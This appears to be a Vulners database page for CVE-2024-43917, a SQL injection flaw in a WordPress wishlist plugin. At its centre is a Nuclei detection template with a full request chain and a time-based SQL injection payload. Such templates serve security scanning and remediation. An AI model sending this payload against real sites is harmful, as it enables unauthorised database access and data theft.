| Reporter | Title | Published | Views | Family All 19 |
|---|---|---|---|---|
| Exploit for SQL Injection in Templateinvaders Ti_Woocommerce_Wishlist | 25 Jun 202519:52 | – | githubexploit | |
| Exploit for SQL Injection in Templateinvaders Ti_Woocommerce_Wishlist | 29 Sep 202406:23 | – | githubexploit | |
| CVE-2024-43917 | 29 Aug 202417:53 | – | circl | |
| WordPress plugin TI WooCommerce Wishlist SQL注入漏洞 | 29 Aug 202400:00 | – | cnnvd | |
| CVE-2024-43917 | 29 Aug 202414:46 | – | cve | |
| CVE-2024-43917 WordPress TI WooCommerce Wishlist plugin <= 2.8.2 - SQL Injection vulnerability | 29 Aug 202414:46 | – | cvelist | |
| WordPress TI WooCommerce Wishlist SQL Injection (CVE-2024-43917) | 31 Oct 202418:53 | – | metasploit | |
| CVE-2024-43917 | 29 Aug 202415:15 | – | nvd | |
| CVE-2024-43917 | 29 Aug 202415:15 | – | osv | |
| WordPress TI WooCommerce Wishlist Plugin <= 2.8.2 is vulnerable to SQL Injection | 22 Aug 202400:00 | – | patchstack |
id: CVE-2024-43917
info:
name: WordPress TI WooCommerce Wishlist Plugin <= 2.8.2 - SQL Injection
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
In the latest version (2.8.2 as of writing the article) and below, the plugin is vulnerable to a SQL injection vulnerability that allows any users to execute arbitrary SQL queries in the database of the WordPress site. No privileges are required to exploit the issue. The vulnerability is unpatched on the latest version and is tracked as the CVE-2024-43917.
impact: |
Unauthenticated attackers can execute time-based SQL injection to extract sensitive data from the WordPress database.
remediation: |
Update TI WooCommerce Wishlist plugin to a version that patches CVE-2024-43917.
reference:
- https://patchstack.com/articles/unpatched-sql-injection-vulnerability-in-ti-woocommerce-wishlist-plugin/
- https://patchstack.com/database/vulnerability/ti-woocommerce-wishlist/wordpress-ti-woocommerce-wishlist-plugin-2-8-2-sql-injection-vulnerability?_s_id=cve
- https://nvd.nist.gov/vuln/detail/CVE-2024-43917
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-43917
cwe-id: CWE-89
epss-score: 0.21769
epss-percentile: 0.97338
cpe: cpe:2.3:a:templateinvaders:ti_woocommerce_wishlist:*:*:*:*:free:wordpress:*:*
metadata:
verified: true
max-request: 4
vendor: templateinvaders
product: ti_woocommerce_wishlist
framework: wordpress
fofa-query: body="/wp-content/plugins/ti-woocommerce-wishlist/"
publicwww-query: "/wp-content/plugins/ti-woocommerce-wishlist/"
tags: time-based-sqli,cve,cve2024,wp,wordpress,ti-woocommerce-wishlist,wp-plugin,sqli,vkev,vuln
flow: http(1) && http(2) && http(3) && http(4)
http:
- raw:
- |
GET /?p=1 HTTP/1.1
Host: {{Hostname}}
redirects: true
extractors:
- type: regex
part: body
internal: true
name: nonce
group: 1
regex:
- '"nonce":"([a-z0-9]+)"'
- raw:
- |
GET /product-category/uncategorized/ HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
part: body
internal: true
name: product_id
group: 1
regex:
- 'data-tinvwl_product_id="([0-9]+)"'
matchers:
- type: word
part: body
words:
- 'data-tinvwl_product_id="'
internal: true
- raw:
- |
POST /product-category/uncategorized/ HTTP/1.1
Host: {{Hostname}}
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryNfcbSwJQX8ALWCMG
------WebKitFormBoundaryNfcbSwJQX8ALWCMG
Content-Disposition: form-data; name="form[tinvwl-hidden-fields]"
[]
------WebKitFormBoundaryNfcbSwJQX8ALWCMG
Content-Disposition: form-data; name="tinv_wishlist_id"
------WebKitFormBoundaryNfcbSwJQX8ALWCMG
Content-Disposition: form-data; name="tinv_wishlist_name"
------WebKitFormBoundaryNfcbSwJQX8ALWCMG
Content-Disposition: form-data; name="product_type"
simple
------WebKitFormBoundaryNfcbSwJQX8ALWCMG
Content-Disposition: form-data; name="product_id"
{{product_id}}
------WebKitFormBoundaryNfcbSwJQX8ALWCMG
Content-Disposition: form-data; name="product_variation"
0
------WebKitFormBoundaryNfcbSwJQX8ALWCMG
Content-Disposition: form-data; name="product_action"
addto
------WebKitFormBoundaryNfcbSwJQX8ALWCMG
Content-Disposition: form-data; name="redirect"
{{RootURL}}/product-category/uncategorized/
------WebKitFormBoundaryNfcbSwJQX8ALWCMG--
extractors:
- type: json
part: body
name: share_key
internal: true
json:
- '.wishlist.share_key'
- raw:
- |
@timeout: 20s
GET /wp-json/wc/v3/wishlist/{{share_key}}/get_products?order=,(select*from(select(sleep(6)))a)--+- HTTP/1.1
Host: {{Hostname}}
X-WP-Nonce: {{nonce}}
matchers-condition: and
matchers:
- type: dsl
dsl:
- "duration>=6"
- "contains(content_type, 'application/json')"
- "contains(body, 'product_id')"
condition: and
# digest: 4b0a0048304602210083ba3959a1b1ba45515d4ea1d24dcf4ff5e123e80d20dcedd20f4c33c7788092022100ad0768c3253298990df7068b31de6f29732c508bf0d303a595e8c5f6f39cf383:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation